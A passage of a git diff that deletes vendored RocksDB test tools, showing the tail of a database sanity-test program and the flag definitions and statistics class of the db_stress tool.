-  explicit SanityTestBasic(const std::string& path) : SanityTest(path) {}
-  virtual Options GetOptions() const override {
-    Options options;
-    options.create_if_missing = true;
-    return options;
-  }
-  virtual std::string Name() const override { return "Basic"; }
-};
-
-class SanityTestSpecialComparator : public SanityTest {
- public:
-  explicit SanityTestSpecialComparator(const std::string& path)
-      : SanityTest(path) {
-    options_.comparator = new NewComparator();
-  }
-  ~SanityTestSpecialComparator() { delete options_.comparator; }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "SpecialComparator"; }
-
- private:
-  class NewComparator : public Comparator {
-   public:
-    virtual const char* Name() const override {
-      return "rocksdb.NewComparator";
-    }
-    virtual int Compare(const Slice& a, const Slice& b) const override {
-      return BytewiseComparator()->Compare(a, b);
-    }
-    virtual void FindShortestSeparator(std::string* s,
-                                       const Slice& l) const override {
-      BytewiseComparator()->FindShortestSeparator(s, l);
-    }
-    virtual void FindShortSuccessor(std::string* key) const override {
-      BytewiseComparator()->FindShortSuccessor(key);
-    }
-  };
-  Options options_;
-};
-
-class SanityTestZlibCompression : public SanityTest {
- public:
-  explicit SanityTestZlibCompression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kZlibCompression;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "ZlibCompression"; }
-
- private:
-  Options options_;
-};
-
-class SanityTestZlibCompressionVersion2 : public SanityTest {
- public:
-  explicit SanityTestZlibCompressionVersion2(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kZlibCompression;
-    BlockBasedTableOptions table_options;
-#if ROCKSDB_MAJOR > 3 || (ROCKSDB_MAJOR == 3 && ROCKSDB_MINOR >= 10)
-    table_options.format_version = 2;
-#endif
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override {
-    return "ZlibCompressionVersion2";
-  }
-
- private:
-  Options options_;
-};
-
-class SanityTestLZ4Compression : public SanityTest {
- public:
-  explicit SanityTestLZ4Compression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kLZ4Compression;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "LZ4Compression"; }
-
- private:
-  Options options_;
-};
-
-class SanityTestLZ4HCCompression : public SanityTest {
- public:
-  explicit SanityTestLZ4HCCompression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kLZ4HCCompression;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "LZ4HCCompression"; }
-
- private:
-  Options options_;
-};
-
-class SanityTestZSTDCompression : public SanityTest {
- public:
-  explicit SanityTestZSTDCompression(const std::string& path)
-      : SanityTest(path) {
-    options_.compression = kZSTD;
-  }
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "ZSTDCompression"; }
-
- private:
-  Options options_;
-};
-
-#ifndef ROCKSDB_LITE
-class SanityTestPlainTableFactory : public SanityTest {
- public:
-  explicit SanityTestPlainTableFactory(const std::string& path)
-      : SanityTest(path) {
-    options_.table_factory.reset(NewPlainTableFactory());
-    options_.prefix_extractor.reset(NewFixedPrefixTransform(2));
-    options_.allow_mmap_reads = true;
-  }
-  ~SanityTestPlainTableFactory() {}
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "PlainTable"; }
-
- private:
-  Options options_;
-};
-#endif  // ROCKSDB_LITE
-
-class SanityTestBloomFilter : public SanityTest {
- public:
-  explicit SanityTestBloomFilter(const std::string& path) : SanityTest(path) {
-    BlockBasedTableOptions table_options;
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10));
-    options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  }
-  ~SanityTestBloomFilter() {}
-  virtual Options GetOptions() const override { return options_; }
-  virtual std::string Name() const override { return "BloomFilter"; }
-
- private:
-  Options options_;
-};
-
-namespace {
-bool RunSanityTests(const std::string& command, const std::string& path) {
-  bool result = true;
-// Suppress false positive clang static anaylzer warnings.
-#ifndef __clang_analyzer__
-  std::vector<SanityTest*> sanity_tests = {
-      new SanityTestBasic(path),
-      new SanityTestSpecialComparator(path),
-      new SanityTestZlibCompression(path),
-      new SanityTestZlibCompressionVersion2(path),
-      new SanityTestLZ4Compression(path),
-      new SanityTestLZ4HCCompression(path),
-      new SanityTestZSTDCompression(path),
-#ifndef ROCKSDB_LITE
-      new SanityTestPlainTableFactory(path),
-#endif  // ROCKSDB_LITE
-      new SanityTestBloomFilter(path)};
-
-  if (command == "create") {
-    fprintf(stderr, "Creating...\n");
-  } else {
-    fprintf(stderr, "Verifying...\n");
-  }
-  for (auto sanity_test : sanity_tests) {
-    Status s;
-    fprintf(stderr, "%s -- ", sanity_test->Name().c_str());
-    if (command == "create") {
-      s = sanity_test->Create();
-    } else {
-      assert(command == "verify");
-      s = sanity_test->Verify();
-    }
-    fprintf(stderr, "%s\n", s.ToString().c_str());
-    if (!s.ok()) {
-      fprintf(stderr, "FAIL\n");
-      result = false;
-    }
-
-    delete sanity_test;
-  }
-#endif  // __clang_analyzer__
-  return result;
-}
-}  // namespace
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  std::string path, command;
-  bool ok = (argc == 3);
-  if (ok) {
-    path = std::string(argv[1]);
-    command = std::string(argv[2]);
-    ok = (command == "create" || command == "verify");
-  }
-  if (!ok) {
-    fprintf(stderr, "Usage: %s <path> [create|verify] \n", argv[0]);
-    exit(1);
-  }
-  if (path.back() != '/') {
-    path += "/";
-  }
-
-  bool sanity_ok = rocksdb::RunSanityTests(command, path);
-
-  return sanity_ok ? 0 : 1;
-}
diff --git a/thirdparty/rocksdb/tools/db_stress.cc b/thirdparty/rocksdb/tools/db_stress.cc
deleted file mode 100644
index d18eeab..0000000
--- a/thirdparty/rocksdb/tools/db_stress.cc
+++ /dev/null
@@ -1,2527 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// The test uses an array to compare against values written to the database.
-// Keys written to the array are in 1:1 correspondence to the actual values in
-// the database according to the formula in the function GenerateValue.
-
-// Space is reserved in the array from 0 to FLAGS_max_key and values are
-// randomly written/deleted/read from those positions. During verification we
-// compare all the positions in the array. To shorten/elongate the running
-// time, you could change the settings: FLAGS_max_key, FLAGS_ops_per_thread,
-// (sometimes also FLAGS_threads).
-//
-// NOTE that if FLAGS_test_batches_snapshots is set, the test will have
-// different behavior. See comment of the flag for details.
-
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#define __STDC_FORMAT_MACROS
-#include <fcntl.h>
-#include <inttypes.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <sys/types.h>
-#include <algorithm>
-#include <chrono>
-#include <exception>
-#include <thread>
-
-#include <gflags/gflags.h>
-#include "db/db_impl.h"
-#include "db/version_set.h"
-#include "hdfs/env_hdfs.h"
-#include "monitoring/histogram.h"
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "rocksdb/write_batch.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/random.h"
-#include "util/string_util.h"
-// SyncPoint is not supported in Released Windows Mode.
-#if !(defined NDEBUG) || !defined(OS_WIN)
-#include "util/sync_point.h"
-#endif  // !(defined NDEBUG) || !defined(OS_WIN)
-#include "util/testutil.h"
-
-#include "utilities/merge_operators.h"
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::RegisterFlagValidator;
-using GFLAGS::SetUsageMessage;
-
-static const long KB = 1024;
-static const int kRandomValueMaxFactor = 3;
-static const int kValueMaxLen = 100;
-
-static bool ValidateUint32Range(const char* flagname, uint64_t value) {
-  if (value > std::numeric_limits<uint32_t>::max()) {
-    fprintf(stderr,
-            "Invalid value for --%s: %lu, overflow\n",
-            flagname,
-            (unsigned long)value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_uint64(seed, 2341234, "Seed for PRNG");
-static const bool FLAGS_seed_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_seed, &ValidateUint32Range);
-
-DEFINE_int64(max_key, 1 * KB* KB,
-             "Max number of key/values to place in database");
-
-DEFINE_int32(column_families, 10, "Number of column families");
-
-DEFINE_int64(
-    active_width, 0,
-    "Number of keys in active span of the key-range at any given time. The "
-    "span begins with its left endpoint at key 0, gradually moves rightwards, "
-    "and ends with its right endpoint at max_key. If set to 0, active_width "
-    "will be sanitized to be equal to max_key.");
-
-// TODO(noetzli) Add support for single deletes
-DEFINE_bool(test_batches_snapshots, false,
-            "If set, the test uses MultiGet(), MultiPut() and MultiDelete()"
-            " which read/write/delete multiple keys in a batch. In this mode,"
-            " we do not verify db content by comparing the content with the "
-            "pre-allocated array. Instead, we do partial verification inside"
-            " MultiGet() by checking various values in a batch. Benefit of"
-            " this mode:\n"
-            "\t(a) No need to acquire mutexes during writes (less cache "
-            "flushes in multi-core leading to speed up)\n"
-            "\t(b) No long validation at the end (more speed up)\n"
-            "\t(c) Test snapshot and atomicity of batch writes");
-
-DEFINE_int32(threads, 32, "Number of concurrent threads to run.");
-
-DEFINE_int32(ttl, -1,
-             "Opens the db with this ttl value if this is not -1. "
-             "Carefully specify a large value such that verifications on "
-             "deleted values don't fail");
-
-DEFINE_int32(value_size_mult, 8,
-             "Size of value will be this number times rand_int(1,3) bytes");
-
-DEFINE_int32(compaction_readahead_size, 0, "Compaction readahead size");
-
-DEFINE_bool(verify_before_write, false, "Verify before write");
-
-DEFINE_bool(histogram, false, "Print histogram of operation timings");
-
-DEFINE_bool(destroy_db_initially, true,
-            "Destroys the database dir before start if this is true");
-
-DEFINE_bool(verbose, false, "Verbose");
-
-DEFINE_bool(progress_reports, true,
-            "If true, db_stress will report number of finished operations");
-
-DEFINE_uint64(db_write_buffer_size, rocksdb::Options().db_write_buffer_size,
-              "Number of bytes to buffer in all memtables before compacting");
-
-DEFINE_int32(write_buffer_size,
-             static_cast<int32_t>(rocksdb::Options().write_buffer_size),
-             "Number of bytes to buffer in memtable before compacting");
-
-DEFINE_int32(max_write_buffer_number,
-             rocksdb::Options().max_write_buffer_number,
-             "The number of in-memory memtables. "
-             "Each memtable is of size FLAGS_write_buffer_size.");
-
-DEFINE_int32(min_write_buffer_number_to_merge,
-             rocksdb::Options().min_write_buffer_number_to_merge,
-             "The minimum number of write buffers that will be merged together "
-             "before writing to storage. This is cheap because it is an "
-             "in-memory merge. If this feature is not enabled, then all these "
-             "write buffers are flushed to L0 as separate files and this "
-             "increases read amplification because a get request has to check "
-             "in all of these files. Also, an in-memory merge may result in "
-             "writing less data to storage if there are duplicate records in"
-             " each of these individual write buffers.");
-
-DEFINE_int32(max_write_buffer_number_to_maintain,
-             rocksdb::Options().max_write_buffer_number_to_maintain,
-             "The total maximum number of write buffers to maintain in memory "
-             "including copies of buffers that have already been flushed. "
-             "Unlike max_write_buffer_number, this parameter does not affect "
-             "flushing. This controls the minimum amount of write history "
-             "that will be available in memory for conflict checking when "
-             "Transactions are used. If this value is too low, some "
-             "transactions may fail at commit time due to not being able to "
-             "determine whether there were any write conflicts. Setting this "
-             "value to 0 will cause write buffers to be freed immediately "
-             "after they are flushed.  If this value is set to -1, "
-             "'max_write_buffer_number' will be used.");
-
-DEFINE_double(memtable_prefix_bloom_size_ratio,
-              rocksdb::Options().memtable_prefix_bloom_size_ratio,
-              "creates prefix blooms for memtables, each with size "
-              "`write_buffer_size * memtable_prefix_bloom_size_ratio`.");
-
-DEFINE_int32(open_files, rocksdb::Options().max_open_files,
-             "Maximum number of files to keep open at the same time "
-             "(use default if == 0)");
-
-DEFINE_int64(compressed_cache_size, -1,
-             "Number of bytes to use as a cache of compressed data."
-             " Negative means use default settings.");
-
-DEFINE_int32(compaction_style, rocksdb::Options().compaction_style, "");
-
-DEFINE_int32(level0_file_num_compaction_trigger,
-             rocksdb::Options().level0_file_num_compaction_trigger,
-             "Level0 compaction start trigger");
-
-DEFINE_int32(level0_slowdown_writes_trigger,
-             rocksdb::Options().level0_slowdown_writes_trigger,
-             "Number of files in level-0 that will slow down writes");
-
-DEFINE_int32(level0_stop_writes_trigger,
-             rocksdb::Options().level0_stop_writes_trigger,
-             "Number of files in level-0 that will trigger put stop.");
-
-DEFINE_int32(block_size,
-             static_cast<int32_t>(rocksdb::BlockBasedTableOptions().block_size),
-             "Number of bytes in a block.");
-
-DEFINE_int32(max_background_compactions,
-             rocksdb::Options().max_background_compactions,
-             "The maximum number of concurrent background compactions "
-             "that can occur in parallel.");
-
-DEFINE_int32(num_bottom_pri_threads, 0,
-             "The number of threads in the bottom-priority thread pool (used "
-             "by universal compaction only).");
-
-DEFINE_int32(compaction_thread_pool_adjust_interval, 0,
-             "The interval (in milliseconds) to adjust compaction thread pool "
-             "size. Don't change it periodically if the value is 0.");
-
-DEFINE_int32(compaction_thread_pool_variations, 2,
-             "Range of background thread pool size variations when adjusted "
-             "periodically.");
-
-DEFINE_int32(max_background_flushes, rocksdb::Options().max_background_flushes,
-             "The maximum number of concurrent background flushes "
-             "that can occur in parallel.");
-
-DEFINE_int32(universal_size_ratio, 0, "The ratio of file sizes that trigger"
-             " compaction in universal style");
-
-DEFINE_int32(universal_min_merge_width, 0, "The minimum number of files to "
-             "compact in universal style compaction");
-
-DEFINE_int32(universal_max_merge_width, 0, "The max number of files to compact"
-             " in universal style compaction");
-
-DEFINE_int32(universal_max_size_amplification_percent, 0,
-             "The max size amplification for universal style compaction");
-
-DEFINE_int32(clear_column_family_one_in, 1000000,
-             "With a chance of 1/N, delete a column family and then recreate "
-             "it again. If N == 0, never drop/create column families. "
-             "When test_batches_snapshots is true, this flag has no effect");
-
-DEFINE_int32(set_options_one_in, 0,
-             "With a chance of 1/N, change some random options");
-
-DEFINE_int32(set_in_place_one_in, 0,
-             "With a chance of 1/N, toggle in place support option");
-
-DEFINE_int64(cache_size, 2LL * KB * KB * KB,
-             "Number of bytes to use as a cache of uncompressed data.");
-
-DEFINE_bool(use_clock_cache, false,
-            "Replace default LRU block cache with clock cache.");
-
-DEFINE_uint64(subcompactions, 1,
-              "Maximum number of subcompactions to divide L0-L1 compactions "
-              "into.");
-
-DEFINE_bool(allow_concurrent_memtable_write, false,
-            "Allow multi-writers to update mem tables in parallel.");
-
-DEFINE_bool(enable_write_thread_adaptive_yield, true,
-            "Use a yielding spin loop for brief writer thread waits.");
-
-static const bool FLAGS_subcompactions_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_subcompactions, &ValidateUint32Range);
-
-static bool ValidateInt32Positive(const char* flagname, int32_t value) {
-  if (value < 0) {
-    fprintf(stderr, "Invalid value for --%s: %d, must be >=0\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(reopen, 10, "Number of times database reopens");
-static const bool FLAGS_reopen_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_reopen, &ValidateInt32Positive);
-
-DEFINE_int32(bloom_bits, 10, "Bloom filter bits per key. "
-             "Negative means use default settings.");
-
-DEFINE_bool(use_block_based_filter, false, "use block based filter"
-              "instead of full filter for block based table");
-
-DEFINE_string(db, "", "Use the db with the following name.");
-
-DEFINE_bool(verify_checksum, false,
-            "Verify checksum for every block read from storage");
-
-DEFINE_bool(mmap_read, rocksdb::Options().allow_mmap_reads,
-            "Allow reads to occur via mmap-ing files");
-
-DEFINE_bool(mmap_write, rocksdb::Options().allow_mmap_writes,
-            "Allow writes to occur via mmap-ing files");
-
-DEFINE_bool(use_direct_reads, rocksdb::Options().use_direct_reads,
-            "Use O_DIRECT for reading data");
-
-DEFINE_bool(use_direct_io_for_flush_and_compaction,
-            rocksdb::Options().use_direct_io_for_flush_and_compaction,
-            "Use O_DIRECT for writing data");
-
-// Database statistics
-static std::shared_ptr<rocksdb::Statistics> dbstats;
-DEFINE_bool(statistics, false, "Create database statistics");
-
-DEFINE_bool(sync, false, "Sync all writes to disk");
-
-DEFINE_bool(use_fsync, false, "If true, issue fsync instead of fdatasync");
-
-DEFINE_int32(kill_random_test, 0,
-             "If non-zero, kill at various points in source code with "
-             "probability 1/this");
-static const bool FLAGS_kill_random_test_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_kill_random_test, &ValidateInt32Positive);
-extern int rocksdb_kill_odds;
-
-DEFINE_string(kill_prefix_blacklist, "",
-              "If non-empty, kill points with prefix in the list given will be"
-              " skipped. Items are comma-separated.");
-extern std::vector<std::string> rocksdb_kill_prefix_blacklist;
-
-DEFINE_bool(disable_wal, false, "If true, do not write WAL for write.");
-
-DEFINE_int64(target_file_size_base, rocksdb::Options().target_file_size_base,
-             "Target level-1 file size for compaction");
-
-DEFINE_int32(target_file_size_multiplier, 1,
-             "A multiplier to compute target level-N file size (N >= 2)");
-
-DEFINE_uint64(max_bytes_for_level_base,
-              rocksdb::Options().max_bytes_for_level_base,
-              "Max bytes for level-1");
-
-DEFINE_double(max_bytes_for_level_multiplier, 2,
-              "A multiplier to compute max bytes for level-N (N >= 2)");
-
-DEFINE_int32(range_deletion_width, 10,
-             "The width of the range deletion intervals.");
-
-DEFINE_uint64(rate_limiter_bytes_per_sec, 0, "Set options.rate_limiter value.");
-
-DEFINE_bool(rate_limit_bg_reads, false,
-            "Use options.rate_limiter on compaction reads");
-
-// Temporarily disable this to allows it to detect new bugs
-DEFINE_int32(compact_files_one_in, 0,
-             "If non-zero, then CompactFiles() will be called one for every N "
-             "operations IN AVERAGE.  0 indicates CompactFiles() is disabled.");
-
-static bool ValidateInt32Percent(const char* flagname, int32_t value) {
-  if (value < 0 || value>100) {
-    fprintf(stderr, "Invalid value for --%s: %d, 0<= pct <=100 \n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-
-DEFINE_int32(readpercent, 10,
-             "Ratio of reads to total workload (expressed as a percentage)");
-static const bool FLAGS_readpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_readpercent, &ValidateInt32Percent);
-
-DEFINE_int32(prefixpercent, 20,
-             "Ratio of prefix iterators to total workload (expressed as a"
-             " percentage)");
-static const bool FLAGS_prefixpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_prefixpercent, &ValidateInt32Percent);
-
-DEFINE_int32(writepercent, 45,
-             "Ratio of writes to total workload (expressed as a percentage)");
-static const bool FLAGS_writepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_writepercent, &ValidateInt32Percent);
-
-DEFINE_int32(delpercent, 15,
-             "Ratio of deletes to total workload (expressed as a percentage)");
-static const bool FLAGS_delpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_delpercent, &ValidateInt32Percent);
-
-DEFINE_int32(delrangepercent, 0,
-             "Ratio of range deletions to total workload (expressed as a "
-             "percentage). Cannot be used with test_batches_snapshots");
-static const bool FLAGS_delrangepercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_delrangepercent, &ValidateInt32Percent);
-
-DEFINE_int32(nooverwritepercent, 60,
-             "Ratio of keys without overwrite to total workload (expressed as "
-             " a percentage)");
-static const bool FLAGS_nooverwritepercent_dummy __attribute__((__unused__)) =
-    RegisterFlagValidator(&FLAGS_nooverwritepercent, &ValidateInt32Percent);
-
-DEFINE_int32(iterpercent, 10, "Ratio of iterations to total workload"
-             " (expressed as a percentage)");
-static const bool FLAGS_iterpercent_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_iterpercent, &ValidateInt32Percent);
-
-DEFINE_uint64(num_iterations, 10, "Number of iterations per MultiIterate run");
-static const bool FLAGS_num_iterations_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_num_iterations, &ValidateUint32Range);
-
-namespace {
-enum rocksdb::CompressionType StringToCompressionType(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "none"))
-    return rocksdb::kNoCompression;
-  else if (!strcasecmp(ctype, "snappy"))
-    return rocksdb::kSnappyCompression;
-  else if (!strcasecmp(ctype, "zlib"))
-    return rocksdb::kZlibCompression;
-  else if (!strcasecmp(ctype, "bzip2"))
-    return rocksdb::kBZip2Compression;
-  else if (!strcasecmp(ctype, "lz4"))
-    return rocksdb::kLZ4Compression;
-  else if (!strcasecmp(ctype, "lz4hc"))
-    return rocksdb::kLZ4HCCompression;
-  else if (!strcasecmp(ctype, "xpress"))
-    return rocksdb::kXpressCompression;
-  else if (!strcasecmp(ctype, "zstd"))
-    return rocksdb::kZSTD;
-
-  fprintf(stderr, "Cannot parse compression type '%s'\n", ctype);
-  return rocksdb::kSnappyCompression; //default value
-}
-
-enum rocksdb::ChecksumType StringToChecksumType(const char* ctype) {
-  assert(ctype);
-  auto iter = rocksdb::checksum_type_string_map.find(ctype);
-  if (iter != rocksdb::checksum_type_string_map.end()) {
-    return iter->second;
-  }
-  fprintf(stderr, "Cannot parse checksum type '%s'\n", ctype);
-  return rocksdb::kCRC32c;
-}
-
-std::string ChecksumTypeToString(rocksdb::ChecksumType ctype) {
-  auto iter = std::find_if(
-      rocksdb::checksum_type_string_map.begin(),
-      rocksdb::checksum_type_string_map.end(),
-      [&](const std::pair<std::string, rocksdb::ChecksumType>&
-              name_and_enum_val) { return name_and_enum_val.second == ctype; });
-  assert(iter != rocksdb::checksum_type_string_map.end());
-  return iter->first;
-}
-
-std::vector<std::string> SplitString(std::string src) {
-  std::vector<std::string> ret;
-  if (src.empty()) {
-    return ret;
-  }
-  size_t pos = 0;
-  size_t pos_comma;
-  while ((pos_comma = src.find(',', pos)) != std::string::npos) {
-    ret.push_back(src.substr(pos, pos_comma - pos));
-    pos = pos_comma + 1;
-  }
-  ret.push_back(src.substr(pos, src.length()));
-  return ret;
-}
-}  // namespace
-
-DEFINE_string(compression_type, "snappy",
-              "Algorithm to use to compress the database");
-static enum rocksdb::CompressionType FLAGS_compression_type_e =
-    rocksdb::kSnappyCompression;
-
-DEFINE_string(checksum_type, "kCRC32c", "Algorithm to use to checksum blocks");
-static enum rocksdb::ChecksumType FLAGS_checksum_type_e = rocksdb::kCRC32c;
-
-DEFINE_string(hdfs, "", "Name of hdfs environment");
-// posix or hdfs environment
-static rocksdb::Env* FLAGS_env = rocksdb::Env::Default();
-
-DEFINE_uint64(ops_per_thread, 1200000, "Number of operations per thread.");
-static const bool FLAGS_ops_per_thread_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_ops_per_thread, &ValidateUint32Range);
-
-DEFINE_uint64(log2_keys_per_lock, 2, "Log2 of number of keys per lock");
-static const bool FLAGS_log2_keys_per_lock_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_log2_keys_per_lock, &ValidateUint32Range);
-
-DEFINE_bool(in_place_update, false, "On true, does inplace update in memtable");
-
-enum RepFactory {
-  kSkipList,
-  kHashSkipList,
-  kVectorRep
-};
-
-namespace {
-enum RepFactory StringToRepFactory(const char* ctype) {
-  assert(ctype);
-
-  if (!strcasecmp(ctype, "skip_list"))
-    return kSkipList;
-  else if (!strcasecmp(ctype, "prefix_hash"))
-    return kHashSkipList;
-  else if (!strcasecmp(ctype, "vector"))
-    return kVectorRep;
-
-  fprintf(stdout, "Cannot parse memreptable %s\n", ctype);
-  return kSkipList;
-}
-}  // namespace
-
-static enum RepFactory FLAGS_rep_factory;
-DEFINE_string(memtablerep, "prefix_hash", "");
-
-static bool ValidatePrefixSize(const char* flagname, int32_t value) {
-  if (value < 0 || value > 8) {
-    fprintf(stderr, "Invalid value for --%s: %d. 0 <= PrefixSize <= 8\n",
-            flagname, value);
-    return false;
-  }
-  return true;
-}
-DEFINE_int32(prefix_size, 7, "Control the prefix size for HashSkipListRep");
-static const bool FLAGS_prefix_size_dummy __attribute__((unused)) =
-    RegisterFlagValidator(&FLAGS_prefix_size, &ValidatePrefixSize);
-
-DEFINE_bool(use_merge, false, "On true, replaces all writes with a Merge "
-            "that behaves like a Put");
-
-DEFINE_bool(use_full_merge_v1, false,
-            "On true, use a merge operator that implement the deprecated "
-            "version of FullMerge");
-
-namespace rocksdb {
-
-// convert long to a big-endian slice key
-static std::string Key(int64_t val) {
-  std::string little_endian_key;
-  std::string big_endian_key;
-  PutFixed64(&little_endian_key, val);
-  assert(little_endian_key.size() == sizeof(val));
-  big_endian_key.resize(sizeof(val));
-  for (size_t i = 0 ; i < sizeof(val); ++i) {
-    big_endian_key[i] = little_endian_key[sizeof(val) - 1 - i];
-  }
-  return big_endian_key;
-}
-
-static std::string StringToHex(const std::string& str) {
-  std::string result = "0x";
-  result.append(Slice(str).ToString(true));
-  return result;
-}
-
-
-class StressTest;
-namespace {
-
-class Stats {
- private:
-  uint64_t start_;
-  uint64_t finish_;
-  double  seconds_;
-  long done_;
-  long gets_;
-  long prefixes_;
-  long writes_;
-  long deletes_;
-  size_t single_deletes_;
-  long iterator_size_sums_;
-  long founds_;
-  long iterations_;
-  long range_deletions_;
-  long covered_by_range_deletions_;
-  long errors_;
-  long num_compact_files_succeed_;
-  long num_compact_files_failed_;
-  int next_report_;
-  size_t bytes_;
-  uint64_t last_op_finish_;
-  HistogramImpl hist_;
-
- public:
-  Stats() { }
-
-  void Start() {
-    next_report_ = 100;
-    hist_.Clear();
-    done_ = 0;
-    gets_ = 0;
-    prefixes_ = 0;
-    writes_ = 0;
-    deletes_ = 0;
-    single_deletes_ = 0;
-    iterator_size_sums_ = 0;
-    founds_ = 0;
-    iterations_ = 0;
-    range_deletions_ = 0;
-    covered_by_range_deletions_ = 0;
-    errors_ = 0;
-    bytes_ = 0;
-    seconds_ = 0;
-    num_compact_files_succeed_ = 0;
-    num_compact_files_failed_ = 0;
-    start_ = FLAGS_env->NowMicros();
-    last_op_finish_ = start_;
-    finish_ = start_;
-  }
-
-  void Merge(const Stats& other) {
-    hist_.Merge(other.hist_);
-    done_ += other.done_;
-    gets_ += other.gets_;
-    prefixes_ += other.prefixes_;
-    writes_ += other.writes_;
-    deletes_ += other.deletes_;
-    single_deletes_ += other.single_deletes_;
-    iterator_size_sums_ += other.iterator_size_sums_;
-    founds_ += other.founds_;
-    iterations_ += other.iterations_;
-    range_deletions_ += other.range_deletions_;
-    covered_by_range_deletions_ = other.covered_by_range_deletions_;
-    errors_ += other.errors_;
-    bytes_ += other.bytes_;
-    seconds_ += other.seconds_;
-    num_compact_files_succeed_ += other.num_compact_files_succeed_;
-    num_compact_files_failed_ += other.num_compact_files_failed_;
-    if (other.start_ < start_) start_ = other.start_;
-    if (other.finish_ > finish_) finish_ = other.finish_;
-  }
-
-  void Stop() {
-    finish_ = FLAGS_env->NowMicros();
-    seconds_ = (finish_ - start_) * 1e-6;
-  }
-
-  void FinishedSingleOp() {
-    if (FLAGS_histogram) {
-      auto now = FLAGS_env->NowMicros();
-      auto micros = now - last_op_finish_;
-      hist_.Add(micros);
-      if (micros > 20000) {
-        fprintf(stdout, "long op: %" PRIu64 " micros%30s\r", micros, "");
-      }
-      last_op_finish_ = now;
-    }
-
-      done_++;
-    if (FLAGS_progress_reports) {
-      if (done_ >= next_report_) {
-        if      (next_report_ < 1000)   next_report_ += 100;
-        else if (next_report_ < 5000)   next_report_ += 500;
-        else if (next_report_ < 10000)  next_report_ += 1000;
-        else if (next_report_ < 50000)  next_report_ += 5000;
-        else if (next_report_ < 100000) next_report_ += 10000;
-        else if (next_report_ < 500000) next_report_ += 50000;
-        else                            next_report_ += 100000;
-        fprintf(stdout, "... finished %ld ops%30s\r", done_, "");
-      }
-    }
-  }
-
-  void AddBytesForWrites(int nwrites, size_t nbytes) {
-    writes_ += nwrites;
-    bytes_ += nbytes;
-  }
-
-  void AddGets(int ngets, int nfounds) {
-    founds_ += nfounds;
-    gets_ += ngets;
-  }
-
-  void AddPrefixes(int nprefixes, int count) {
-    prefixes_ += nprefixes;
-    iterator_size_sums_ += count;
-  }
-
-  void AddIterations(int n) {
-    iterations_ += n;
-  }
-
-  void AddDeletes(int n) {
-    deletes_ += n;
-  }
-
-  void AddSingleDeletes(size_t n) { single_deletes_ += n; }
-
-  void AddRangeDeletions(int n) {
-    range_deletions_ += n;
-  }
-
-  void AddCoveredByRangeDeletions(int n) {
-    covered_by_range_deletions_ += n;
-  }
-
-  void AddErrors(int n) {
-    errors_ += n;
-  }
-
-  void AddNumCompactFilesSucceed(int n) { num_compact_files_succeed_ += n; }
-
-  void AddNumCompactFilesFailed(int n) { num_compact_files_failed_ += n; }
-
-  void Report(const char* name) {
-    std::string extra;
-    if (bytes_ < 1 || done_ < 1) {
-      fprintf(stderr, "No writes or ops?\n");
-      return;
-    }
-
-    double elapsed = (finish_ - start_) * 1e-6;
-    double bytes_mb = bytes_ / 1048576.0;
-    double rate = bytes_mb / elapsed;
-    double throughput = (double)done_/elapsed;
-
-    fprintf(stdout, "%-12s: ", name);
-    fprintf(stdout, "%.3f micros/op %ld ops/sec\n",
-            seconds_ * 1e6 / done_, (long)throughput);
-    fprintf(stdout, "%-12s: Wrote %.2f MB (%.2f MB/sec) (%ld%% of %ld ops)\n",
-            "", bytes_mb, rate, (100*writes_)/done_, done_);
-    fprintf(stdout, "%-12s: Wrote %ld times\n", "", writes_);
